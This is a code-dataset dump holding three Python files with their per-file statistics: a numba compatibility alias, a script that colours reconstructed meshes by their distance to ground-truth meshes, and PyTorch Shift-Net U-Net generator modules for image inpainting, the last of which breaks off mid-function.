| 0.81378
| 0.623836
| 0.623836
| 0.535692
| 0.490379
| 0
| 0
| 0.301211
| 0.105932
| 2,124
| 19
| 157
| 111.789474
| 0.54713
| 0
| 0
| 0
| 0
| 0.684211
| 0.802731
| 0.734934
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
732e15bcbabdf63515fb362ddeb261e6b7455494
| 195
|
py
|
Python
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/numba/cffi_support.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | 1,738
|
2017-09-21T10:59:12.000Z
|
2022-03-31T21:05:46.000Z
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/numba/cffi_support.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | 427
|
2017-09-29T22:54:36.000Z
|
2022-02-15T19:26:50.000Z
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/numba/cffi_support.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | 671
|
2017-09-21T08:04:01.000Z
|
2022-03-29T14:30:07.000Z
|
# -*- coding: utf-8 -*-
"""
Alias to numba.typing.cffi_utils for backward compatibility
"""
from __future__ import print_function, division, absolute_import
from numba.typing.cffi_utils import *
| 27.857143
| 64
| 0.769231
| 26
| 195
| 5.461538
| 0.730769
| 0.15493
| 0.211268
| 0.28169
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005814
| 0.117949
| 195
| 6
| 65
| 32.5
| 0.819767
| 0.420513
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
734e7be00f5be4565ab9d58b44ae82f605e8265c
| 26,762
|
py
|
Python
|
source/figure/distance_vis.py
|
phygitalism/points2surf
|
c8e6d47062fc068802e179a37427981c8e10b128
|
[
"MIT"
] | 260
|
2020-07-09T13:21:51.000Z
|
2022-03-30T09:48:49.000Z
|
source/figure/distance_vis.py
|
phygitalism/points2surf
|
c8e6d47062fc068802e179a37427981c8e10b128
|
[
"MIT"
] | 14
|
2020-12-16T05:33:59.000Z
|
2022-02-11T01:03:29.000Z
|
source/figure/distance_vis.py
|
phygitalism/points2surf
|
c8e6d47062fc068802e179a37427981c8e10b128
|
[
"MIT"
] | 31
|
2020-07-22T13:13:38.000Z
|
2022-03-04T16:14:09.000Z
|
# This messy code computes vertex colors based on the distance reconstruction <-> GT mesh
from source.base import parula_colormap
from source.base import utils_mp
import numpy as np
import trimesh
import trimesh.proximity
def get_normalization_target(distances: list, cut_percentil=0.9):
    """Pick the value the per-vertex distances will be normalized by.

    All distance arrays are concatenated and sorted; the result is the value
    at *cut_percentil* of the sorted distances, or the overall maximum when
    no valid percentile (< 1.0) is given.
    """
    all_dists = np.sort(np.concatenate(distances, axis=0))
    if cut_percentil is None or cut_percentil >= 1.0:
        return all_dists[-1]
    return all_dists[int(all_dists.shape[0] * cut_percentil)]
def get_closest_distance_batched(query_pts: np.ndarray, mesh: trimesh.Trimesh, batch_size=1000):
    """Distance from each query point to the closest point on *mesh*.

    trimesh's proximity queries are very memory-hungry (roughly 8 GB for 3k
    queries against a 27k-vertex mesh), so the points are queried in batches
    of about *batch_size*, farmed out over all CPU cores.
    """
    import multiprocessing
    worker_count = multiprocessing.cpu_count()
    num_batches = max(1, int(query_pts.shape[0] / batch_size))
    id_batches = np.array_split(np.arange(query_pts.shape[0]), num_batches)
    job_args = [(mesh, query_pts[ids]) for ids in id_batches]
    batch_results = utils_mp.start_process_pool(trimesh.proximity.closest_point, job_args, worker_count)
    # closest_point returns (points, distances, triangle_ids); keep distances.
    dists = np.concatenate([res[1] for res in batch_results])
    print('got distances for {} vertices'.format(query_pts.shape[0]))
    return dists
def visualize_mesh_with_distances(mesh_file: str, mesh: trimesh.Trimesh,
                                  dist_per_vertex: np.ndarray, normalize_to: float, cut_percentil=0.9):
    """Export a copy of *mesh* colored by per-vertex distance plus a stats file.

    Distances are divided by *normalize_to* and mapped through the parula
    colormap (0 -> blue, 0.5 -> green, 1.0 -> yellow); anything beyond the
    normalization target is clamped to the last colormap entry. Writes
    ``<mesh_file>_vis.ply`` and ``<mesh_file>_stats.txt``.
    """
    normalized = dist_per_vertex / normalize_to
    num_colors = parula_colormap.parula_cm.shape[0]
    color_ids = (normalized * (num_colors - 1)).astype(np.int32)
    # Clamp indices at or past the end of the colormap to the last color.
    color_ids[color_ids >= num_colors] = num_colors - 1
    vertex_colors = [parula_colormap.parula_cm[color_id] for color_id in color_ids]
    out_mesh_file = mesh_file + '_vis.ply'
    colored_mesh = trimesh.Trimesh(vertices=mesh.vertices, faces=mesh.faces, vertex_colors=vertex_colors)
    colored_mesh.export(out_mesh_file)
    out_stats_file = mesh_file + '_stats.txt'
    with open(out_stats_file, 'w+') as stats_file:
        stats_file.write(
            'Distance from reconstructed mesh vertex to nearest sample on GT mesh, '
            'Min={}, Max={}, Mean={}, normalized to {}, cut percentil {}'.format(
                np.min(dist_per_vertex), np.max(dist_per_vertex), np.mean(dist_per_vertex),
                normalize_to, cut_percentil)
        )
def make_distance_comparison(in_file_rec_meshes: list, in_file_gt_mesh, cut_percentil=0.9, batch_size=1000):
    """Color each reconstructed mesh by its distance to the ground-truth mesh.

    in_file_gt_mesh may be a single path (one GT mesh shared by all
    reconstructions) or a list of paths (one GT mesh per reconstruction,
    matched by index). All meshes share one normalization target so their
    colors are comparable.
    """
    import trimesh.proximity
    meshes_rec = [trimesh.load(in_file_rec_mesh) for in_file_rec_mesh in in_file_rec_meshes]
    if type(in_file_gt_mesh) == str:
        mesh_gt = trimesh.load(in_file_gt_mesh)
    elif type(in_file_gt_mesh) == list:
        # NOTE: the comprehension's loop variable deliberately shadows the
        # argument of the same name; it loads each path in the list.
        mesh_gt = [trimesh.load(in_file_gt_mesh) for in_file_gt_mesh in in_file_gt_mesh]
    else:
        raise ValueError('Not implemented!')
    # vertices_rec_dists = [trimesh.proximity.closest_point(mesh_gt, mesh_rec.vertices)[1] for mesh_rec in meshes_rec]
    # Per reconstruction: distance of every vertex to (its) GT mesh.
    if type(in_file_gt_mesh) == str:
        vertices_rec_dists = [get_closest_distance_batched(mesh_rec.vertices, mesh_gt, batch_size)
                              for mesh_rec in meshes_rec]
    elif type(in_file_gt_mesh) == list:
        vertices_rec_dists = [get_closest_distance_batched(mesh_rec.vertices, mesh_gt[mi], batch_size)
                              for mi, mesh_rec in enumerate(meshes_rec)]
    else:
        raise ValueError('Not implemented!')
    # One shared normalization target so all exported meshes use the same
    # color scale.
    normalize_to = get_normalization_target(vertices_rec_dists, cut_percentil=cut_percentil)
    for fi, f in enumerate(in_file_rec_meshes):
        visualize_mesh_with_distances(
            f, meshes_rec[fi], dist_per_vertex=vertices_rec_dists[fi],
            normalize_to=normalize_to, cut_percentil=cut_percentil)
def main(in_file_rec_meshes: list, in_file_gt_mesh, cut_percentile=0.9, batch_size=1000):
    """Entry point: announce the comparison, then run it."""
    print(f'Visualize distances of {in_file_rec_meshes} to {in_file_gt_mesh}')
    make_distance_comparison(
        in_file_rec_meshes=in_file_rec_meshes, in_file_gt_mesh=in_file_gt_mesh,
        cut_percentil=cut_percentile, batch_size=batch_size)
if __name__ == "__main__":
    # NOTE: this section previously carried ~220 lines of alternative,
    # commented-out figure configurations (holes/flats/denoising close-ups,
    # noise comparison, qualitative ABC/custom/Thingi10k sets). They were
    # removed as dead code; recover them from version control if needed.
    #
    # Active configuration: qualitative ABC supplementary figures.
    base_dir = '/home/perler/Nextcloud/point2surf results/figures/supp_abc/'
    # Reconstruction methods, in the column order used by the figure.
    methods = ('point2surf', 'deepsdf', 'atlasnet', 'spsr+pcpnet')
    # Meshes to visualize for each noise level.
    meshes_per_noise_level = {
        'original': [
            '00014489_f4297f01e3434034b7051ebb_trimesh_004.ply',
            '00015750_bca56983eee140db9aa4c9a1_trimesh_091.ply',
            '00991527_88dccf1e5fa948d4fe1757ed_trimesh_009.ply'],
        'extra_noisy': [
            '00012076_bd0ba1071db44a4cb05e612c_trimesh_011.ply',
            '00017846_08893609d30e453493c4c079_trimesh_021.ply',
            '00018330_ae93a6d282364256a7bb3358_trimesh_010.ply'],
        'noisefree': [
            '00011000_8a21002f126e4425a811e70a_trimesh_004.ply',
            '00011602_c087f04c99464bf7ab2380c4_trimesh_000.ply',
            '00993805_e549aee7e0b31a7501eb8669_trimesh_012.ply'],
    }

    in_dirs_rec_meshes = []
    in_dirs_gt_meshes = []
    for noise_level, mesh_names in meshes_per_noise_level.items():
        for mesh_name in mesh_names:
            for method in methods:
                # AtlasNet outputs use a different file naming scheme.
                rec_name = mesh_name[:-4] + '.xyz.npy.ply' if method == 'atlasnet' else mesh_name
                in_dirs_rec_meshes.append(base_dir + method + '/' + noise_level + '/' + rec_name)
            # One GT entry per reconstruction method.
            in_dirs_gt_meshes += [base_dir + 'gt/' + noise_level + '/' + mesh_name] * len(methods)

    main(in_dirs_rec_meshes, in_dirs_gt_meshes, cut_percentile=0.9, batch_size=300)
| 69.692708
| 145
| 0.72319
| 3,348
| 26,762
| 5.514038
| 0.083035
| 0.072802
| 0.150263
| 0.229348
| 0.815557
| 0.799144
| 0.787769
| 0.774173
| 0.768106
| 0.768106
| 0
| 0.040191
| 0.153015
| 26,762
| 383
| 146
| 69.874674
| 0.774253
| 0.691652
| 0
| 0.130841
| 0
| 0
| 0.237588
| 0.199975
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046729
| false
| 0
| 0.065421
| 0
| 0.140187
| 0.018692
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b4053e6a49a2d2dda8ef7eb7bf5c30050de097fd
| 26,254
|
py
|
Python
|
models/modules/shift_unet.py
|
Sunshine352/Shift-Net_pytorch
|
a7e7ddbf966bd65f16e7fe2c36ec6be7e9e813d0
|
[
"MIT"
] | 1
|
2018-12-21T05:42:07.000Z
|
2018-12-21T05:42:07.000Z
|
models/modules/shift_unet.py
|
Sunshine352/Shift-Net_pytorch
|
a7e7ddbf966bd65f16e7fe2c36ec6be7e9e813d0
|
[
"MIT"
] | null | null | null |
models/modules/shift_unet.py
|
Sunshine352/Shift-Net_pytorch
|
a7e7ddbf966bd65f16e7fe2c36ec6be7e9e813d0
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
from models.accelerated_shift_net.accelerated_InnerShiftTriple import AcceleratedInnerShiftTriple
from models.shift_net.InnerCos import InnerCos
from models.shift_net.InnerShiftTriple import InnerShiftTriple
from models.soft_shift_net.innerSoftShiftTriple import InnerSoftShiftTriple
from .unet import UnetSkipConnectionBlock
from .modules import *
################################### *************************** #####################################
################################### This is the original Shift-Net ##################################
################################### *************************** #####################################
# Defines the Unet generator.
# |num_downs|: number of downsamplings in UNet. For example,
# if |num_downs| == 7, image of size 128x128 will become of size 1x1
# at the bottleneck
class UnetGeneratorShiftTriple(nn.Module):
    """U-Net generator with a shift-triple block inserted in the decoder.

    `num_downs` is the number of downsamplings; e.g. with num_downs == 7 a
    128x128 image becomes 1x1 at the bottleneck.
    """

    def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
                 norm_layer=nn.BatchNorm2d, use_dropout=False):
        super(UnetGeneratorShiftTriple, self).__init__()
        # Assemble the U-Net from the innermost block outward.
        block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None,
                                        norm_layer=norm_layer, innermost=True)
        # The inner layer count is 3 (spatial size 512x512) for unet_256.
        for _ in range(num_downs - 5):
            block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=block,
                                            norm_layer=norm_layer, use_dropout=use_dropout)
        block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=block,
                                        norm_layer=norm_layer)
        # The shift block sits at the ngf*2 level of the decoder.
        shift_block = UnetSkipConnectionShiftTriple(ngf * 2, ngf * 4, opt, innerCos_list, shift_list,
                                                    mask_global, input_nc=None,
                                                    submodule=block, norm_layer=norm_layer)
        block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=shift_block,
                                        norm_layer=norm_layer)
        block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=block,
                                        outermost=True, norm_layer=norm_layer)
        self.model = block

    def forward(self, input):
        return self.model(input)
# Note: the TripleBlock differs in its `upconv` definition.
# 'cos' means that we add a `innerCos` layer in the block.
class UnetSkipConnectionShiftTriple(nn.Module):
    """U-Net skip-connection block that inserts a shift-triple layer and a
    latent constraint (InnerCos) into the decoder path.

    The constructed shift and InnerCos layers are appended to the caller's
    `shift_list` / `innerCos_list` so they remain accessible from outside
    (e.g. for mask updates or collecting constraint losses).
    """

    def __init__(self, outer_nc, inner_nc, opt, innerCos_list, shift_list, mask_global, input_nc, \
                 submodule=None, shift_layer=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_dropout=False):
        super(UnetSkipConnectionShiftTriple, self).__init__()
        self.outermost = outermost
        if input_nc is None:
            input_nc = outer_nc
        downconv = nn.Conv2d(input_nc, inner_nc, kernel_size=4,
                             stride=2, padding=1)
        downrelu = nn.LeakyReLU(0.2, True)
        downnorm = norm_layer(inner_nc, affine=True)
        uprelu = nn.ReLU(True)
        upnorm = norm_layer(outer_nc, affine=True)

        # The downconv layer maps outer_nc in -> inner_nc out, so the shift
        # is defined at this feature resolution.
        shift = InnerShiftTriple(opt.fixed_mask, opt.shift_sz, opt.stride, opt.mask_thred, opt.triple_weight)
        shift.set_mask(mask_global, 3)
        shift_list.append(shift)

        # Latent constraint layer; it needs the mask set as well, and is
        # registered in the constraint-layer list.
        innerCos = InnerCos(strength=opt.strength, skip=opt.skip)
        innerCos.set_mask(mask_global, 3)
        innerCos_list.append(innerCos)

        # The three positions only differ in `upconv`.
        if outermost:
            # Outermost block ends with tanh.
            upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,
                                        kernel_size=4, stride=2,
                                        padding=1)
            down = [downconv]
            up = [uprelu, upconv, nn.Tanh()]
            model = down + [submodule] + up
        elif innermost:
            # Innermost block: no submodule, upconv takes `inner_nc` instead
            # of `inner_nc*2`, and the bn after downconv is dropped.
            upconv = nn.ConvTranspose2d(inner_nc, outer_nc,
                                        kernel_size=4, stride=2,
                                        padding=1)
            down = [downrelu, downconv]
            up = [uprelu, upconv, upnorm]
            model = down + up
        else:
            # Shift triple differs here: concatenation triples the channels,
            # hence `inner_nc * 3` and not `* 2`.
            upconv = nn.ConvTranspose2d(inner_nc * 3, outer_nc,
                                        kernel_size=4, stride=2,
                                        padding=1)
            down = [downrelu, downconv, downnorm]
            # innerCos is placed before shift so the latent gradient reaches
            # the former part of the network.
            # BUGFIX: the same InnerCos module was previously inserted twice
            # ([..., innerCos, shift, innerCos, ...]), applying the identical
            # constraint layer both before and after the shift. It is now
            # applied once, before the shift, matching the stated intent and
            # the accelerated variant below.
            up = [uprelu, innerCos, shift, upconv, upnorm]
            if use_dropout:
                model = down + [submodule] + up + [nn.Dropout(0.5)]
            else:
                model = down + [submodule] + up
        self.model = nn.Sequential(*model)

    def forward(self, x):
        if self.outermost:  # the outermost block directly passes the input through
            return self.model(x)
        else:
            x_latter = self.model(x)
            _, _, h, w = x.size()
            if h != x_latter.size(2) or w != x_latter.size(3):
                # Resize back to the input resolution before concatenating.
                x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
            return torch.cat([x_latter, x], 1)  # cat in the C channel
################################### *************************** #####################################
################################### This is the accelerated Shift-Net ###############################
################################### *************************** #####################################
# Defines the Unet generator.
# |num_downs|: number of downsamplings in UNet. For example,
# if |num_downs| == 7, image of size 128x128 will become of size 1x1
# at the bottleneck
class AcceleratedUnetGeneratorShiftTriple(nn.Module):
    """U-Net generator using the accelerated shift-triple block.

    `num_downs` is the number of downsamplings; e.g. with num_downs == 7 a
    128x128 image becomes 1x1 at the bottleneck.
    """

    def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
                 norm_layer=nn.BatchNorm2d, use_dropout=False):
        super(AcceleratedUnetGeneratorShiftTriple, self).__init__()
        # Construct the unet structure from the innermost block outward.
        unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer,
                                             innermost=True)
        # (Removed a stray debug `print(unet_block)` left over from development.)
        for i in range(num_downs - 5):  # the inner layer count is 3 (spatial size 512x512), if unet_256
            unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block,
                                                 norm_layer=norm_layer, use_dropout=use_dropout)
        unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block,
                                             norm_layer=norm_layer)
        unet_shift_block = AcceleratedUnetSkipConnectionShiftTriple(ngf * 2, ngf * 4, opt, innerCos_list, shift_list,
                                                                    mask_global, input_nc=None,
                                                                    submodule=unet_block,
                                                                    norm_layer=norm_layer)  # passing in unet_shift_block
        unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_shift_block,
                                             norm_layer=norm_layer)
        unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True,
                                             norm_layer=norm_layer)
        self.model = unet_block

    def forward(self, input):
        return self.model(input)
# Note: the TripleBlock differs in its `upconv` definition.
# 'cos' means that we add a `innerCos` layer in the block.
class AcceleratedUnetSkipConnectionShiftTriple(nn.Module):
    """U-Net skip-connection block with an accelerated shift-triple layer and
    a latent InnerCos constraint in the decoder path.

    The created shift and InnerCos layers are appended to the caller's
    `shift_list` / `innerCos_list` so they stay reachable from outside.
    """

    def __init__(self, outer_nc, inner_nc, opt, innerCos_list, shift_list, mask_global, input_nc, \
                 submodule=None, shift_layer=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d,
                 use_dropout=False):
        super(AcceleratedUnetSkipConnectionShiftTriple, self).__init__()
        self.outermost = outermost
        if input_nc is None:
            input_nc = outer_nc

        # Shared building layers for all three block positions.
        downconv = nn.Conv2d(input_nc, inner_nc, kernel_size=4, stride=2, padding=1)
        downrelu = nn.LeakyReLU(0.2, True)
        downnorm = norm_layer(inner_nc, affine=True)
        uprelu = nn.ReLU(True)
        upnorm = norm_layer(outer_nc, affine=True)

        # downconv maps outer_nc -> inner_nc, so the shift operates at this
        # feature resolution; register it for external access.
        shift = AcceleratedInnerShiftTriple(opt.fixed_mask, opt.shift_sz, opt.stride, opt.mask_thred,
                                            opt.triple_weight)
        shift.set_mask(mask_global, 3)
        shift_list.append(shift)

        # Latent constraint layer; needs the mask too, and is registered in
        # the constraint-layer list.
        innerCos = InnerCos(strength=opt.strength, skip=opt.skip)
        innerCos.set_mask(mask_global, 3)
        innerCos_list.append(innerCos)

        # Only `upconv` differs between the three positions.
        if outermost:
            # Outermost: no down-activation, tanh output.
            upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc, kernel_size=4, stride=2, padding=1)
            layers = [downconv, submodule, uprelu, upconv, nn.Tanh()]
        elif innermost:
            # Innermost: no submodule, upconv takes inner_nc (not inner_nc*2),
            # and the bn after downconv is dropped.
            upconv = nn.ConvTranspose2d(inner_nc, outer_nc, kernel_size=4, stride=2, padding=1)
            layers = [downrelu, downconv, uprelu, upconv, upnorm]
        else:
            # Shift triple: concatenation triples the channels, hence `* 3`.
            # innerCos sits before shift so the latent gradient reaches the
            # former part of the network.
            upconv = nn.ConvTranspose2d(inner_nc * 3, outer_nc, kernel_size=4, stride=2, padding=1)
            layers = [downrelu, downconv, downnorm, submodule,
                      uprelu, innerCos, shift, upconv, upnorm]
            if use_dropout:
                layers.append(nn.Dropout(0.5))

        self.model = nn.Sequential(*layers)

    def forward(self, x):
        # The outermost block directly passes the input through.
        if self.outermost:
            return self.model(x)
        out = self.model(x)
        _, _, h, w = x.size()
        if out.size(2) != h or out.size(3) != w:
            # Resize back to the input resolution before concatenating.
            out = F.interpolate(out, (h, w), mode='bilinear')
        return torch.cat([out, x], 1)  # cat in the C channel
class SoftUnetGeneratorShiftTriple(nn.Module):
    """U-Net generator using the soft shift-triple block.

    `num_downs` is the number of downsamplings; e.g. with num_downs == 7 a
    128x128 image becomes 1x1 at the bottleneck.
    """

    def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
                 norm_layer=nn.BatchNorm2d, use_dropout=False):
        super(SoftUnetGeneratorShiftTriple, self).__init__()
        # Construct the unet structure from the innermost block outward.
        unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer,
                                             innermost=True)
        # (Removed a stray debug `print(unet_block)` left over from development.)
        for i in range(num_downs - 5):  # the inner layer count is 3 (spatial size 512x512), if unet_256
            unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block,
                                                 norm_layer=norm_layer, use_dropout=use_dropout)
        unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block,
                                             norm_layer=norm_layer)
        unet_shift_block = SoftUnetSkipConnectionBlock(ngf * 2, ngf * 4, opt, innerCos_list, shift_list,
                                                       mask_global, input_nc=None,
                                                       submodule=unet_block,
                                                       norm_layer=norm_layer, shift_layer=True)  # passing in unet_shift_block
        unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_shift_block,
                                             norm_layer=norm_layer)
        unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True,
                                             norm_layer=norm_layer)
        self.model = unet_block

    def forward(self, input):
        return self.model(input)
# construct network from the inside to the outside.
# Defines the submodule with skip connection.
# X -------------------identity---------------------- X
# |-- downsampling -- |submodule| -- upsampling --|
class SoftUnetSkipConnectionBlock(nn.Module):
    """U-Net skip-connection block that inserts a soft shift-triple layer.

    Besides the usual down/up sampling path, the constructor creates:
      * an InnerSoftShiftTriple layer, appended to `shift_list`, and
      * two InnerCos latent-constraint layers (one before and one after the
        shift), appended to `innerCos_list`.
    The caller keeps those lists so it can drive the layers during training.

    NOTE(review): the `shift_layer` parameter is accepted but never read here;
    shift/innerCos layers are created unconditionally even for
    outermost/innermost blocks (where they are not put into the model) —
    presumably only ever constructed with shift_layer=True; verify callers.
    """

    def __init__(self, outer_nc, inner_nc, opt, innerCos_list, shift_list, mask_global, input_nc, \
                 submodule=None, shift_layer=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_dropout=False):
        super(SoftUnetSkipConnectionBlock, self).__init__()
        self.outermost = outermost
        if input_nc is None:
            input_nc = outer_nc
        downconv = nn.Conv2d(input_nc, inner_nc, kernel_size=4,
                             stride=2, padding=1)
        downrelu = nn.LeakyReLU(0.2, True)
        downnorm = norm_layer(inner_nc, affine=True)
        uprelu = nn.ReLU(True)
        upnorm = norm_layer(outer_nc, affine=True)

        # As the downconv layer is outer_nc in and inner_nc out,
        # the shift is defined like this:
        shift = InnerSoftShiftTriple(opt.fixed_mask, opt.shift_sz, opt.stride, opt.mask_thred, opt.triple_weight)
        shift.set_mask(mask_global, 3)
        shift_list.append(shift)

        # Add latent constraints and register them in the constraint-layer list.
        innerCosBefore = InnerCos(strength=opt.strength, skip=opt.skip)
        innerCosBefore.set_mask(mask_global, 3)  # The innerCos layer needs the mask too.
        innerCos_list.append(innerCosBefore)

        innerCosAfter = InnerCos(strength=opt.strength, skip=opt.skip)
        innerCosAfter.set_mask(mask_global, 3)  # The innerCos layer needs the mask too.
        innerCos_list.append(innerCosAfter)

        # The three positions differ only in `upconv`;
        # for the outermost, the special part is `tanh`.
        if outermost:
            upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,
                                        kernel_size=4, stride=2,
                                        padding=1)
            down = [downconv]
            up = [uprelu, upconv, nn.Tanh()]
            model = down + [submodule] + up
        # for the innermost, the special part is `inner_nc` instead of `inner_nc*2`
        elif innermost:
            upconv = nn.ConvTranspose2d(inner_nc, outer_nc,
                                        kernel_size=4, stride=2,
                                        padding=1)
            down = [downrelu, downconv]  # for the innermost: no submodule, and no bn
            up = [uprelu, upconv, upnorm]
            model = down + up
        # else, the normal middle block
        else:
            # shift triple differs here: it is `*3`, not `*2`, because the
            # shift concatenates a third feature set onto the up path.
            upconv = nn.ConvTranspose2d(inner_nc * 3, outer_nc,
                                        kernel_size=4, stride=2,
                                        padding=1)
            down = [downrelu, downconv, downnorm]
            # shift is placed after uprelu.
            # NB: innerCos layers wrap the shift, so the latent gradient is
            # added to the former part.
            up = [uprelu, innerCosBefore, shift, innerCosAfter, upconv, upnorm]
            if use_dropout:
                model = down + [submodule] + up + [nn.Dropout(0.5)]
            else:
                model = down + [submodule] + up
        self.model = nn.Sequential(*model)

    def forward(self, x):
        if self.outermost:  # if it is the outermost, directly pass the input in.
            return self.model(x)
        else:
            x_latter = self.model(x)
            _, _, h, w = x.size()
            # Resize back if the down/up path changed the spatial size.
            if h != x_latter.size(2) or w != x_latter.size(3):
                x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
            return torch.cat([x_latter, x], 1)  # cat in the C channel
class InceptionUnetGeneratorShiftTriple(nn.Module):
    """Inception-flavoured U-Net generator with a shift-triple layer.

    Assembled recursively from the innermost block outward; the shift block
    sits at the ngf*2 <-> ngf*4 level and registers its shift/innerCos
    layers in the caller-owned lists.
    """

    def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
                 norm_layer=nn.BatchNorm2d, use_dropout=False):
        super(InceptionUnetGeneratorShiftTriple, self).__init__()
        # Innermost block first.
        block = InceptionUnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None,
                                                 norm_layer=norm_layer, innermost=True)
        # Intermediate ngf*8 blocks; 3 of them for unet_256.
        for _ in range(num_downs - 5):
            block = InceptionUnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=block,
                                                     norm_layer=norm_layer, use_dropout=use_dropout)
        block = InceptionUnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=block,
                                                 norm_layer=norm_layer)
        # Shift block: registers its shift/innerCos layers in the shared lists.
        block = InceptionShiftUnetSkipConnectionBlock(ngf * 2, ngf * 4, opt=opt, innerCos_list=innerCos_list,
                                                      shift_list=shift_list, mask_global=mask_global,
                                                      input_nc=None, submodule=block,
                                                      norm_layer=norm_layer, shift_layer=True)
        block = InceptionUnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=block,
                                                 norm_layer=norm_layer)
        block = InceptionUnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=block,
                                                 outermost=True, norm_layer=norm_layer)
        self.model = block

    def forward(self, input):
        """Apply the full recursive U-Net to `input`."""
        return self.model(input)
# construct network from the inside to the outside.
# Defines the submodule with skip connection.
# X -------------------identity---------------------- X
# |-- downsampling -- |submodule| -- upsampling --|
class InceptionUnetSkipConnectionBlock(nn.Module):
    """Standard U-Net skip block using Inception down/up sampling modules.

    X ----------------------identity---------------------- X
      |-- downsampling -- |submodule| -- upsampling --|
    """

    def __init__(self, outer_nc, inner_nc, input_nc,
                 submodule=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_dropout=False):
        super(InceptionUnetSkipConnectionBlock, self).__init__()
        self.outermost = outermost
        if input_nc is None:
            input_nc = outer_nc

        down_sample = InceptionDown(input_nc, inner_nc)
        down_act = nn.LeakyReLU(0.2, True)
        down_norm = norm_layer(inner_nc, affine=True)
        up_act = nn.ReLU(True)
        up_norm = norm_layer(outer_nc, affine=True)

        if outermost:
            # Outermost: plain strided conv down, transposed conv up, tanh output.
            down_sample = nn.Conv2d(input_nc, inner_nc, kernel_size=4,
                                    stride=2, padding=1)
            up_sample = nn.ConvTranspose2d(inner_nc * 2, outer_nc, kernel_size=4, stride=2, padding=1)
            layers = [down_sample, submodule, up_act, up_sample, nn.Tanh()]
        elif innermost:
            # Innermost: no submodule and no down-norm; up path takes inner_nc channels.
            up_sample = InceptionUp(inner_nc, outer_nc)
            layers = [down_act, down_sample, up_act, up_sample, up_norm]
        else:
            # Middle block: the skip concat doubles the channels on the way up.
            up_sample = InceptionUp(inner_nc * 2, outer_nc)
            layers = [down_act, down_sample, down_norm, submodule, up_act, up_sample, up_norm]
            if use_dropout:
                layers.append(nn.Dropout(0.5))
        self.model = nn.Sequential(*layers)

    def forward(self, x):
        """Run the block; non-outermost blocks concatenate the skip input."""
        if self.outermost:
            return self.model(x)
        decoded = self.model(x)
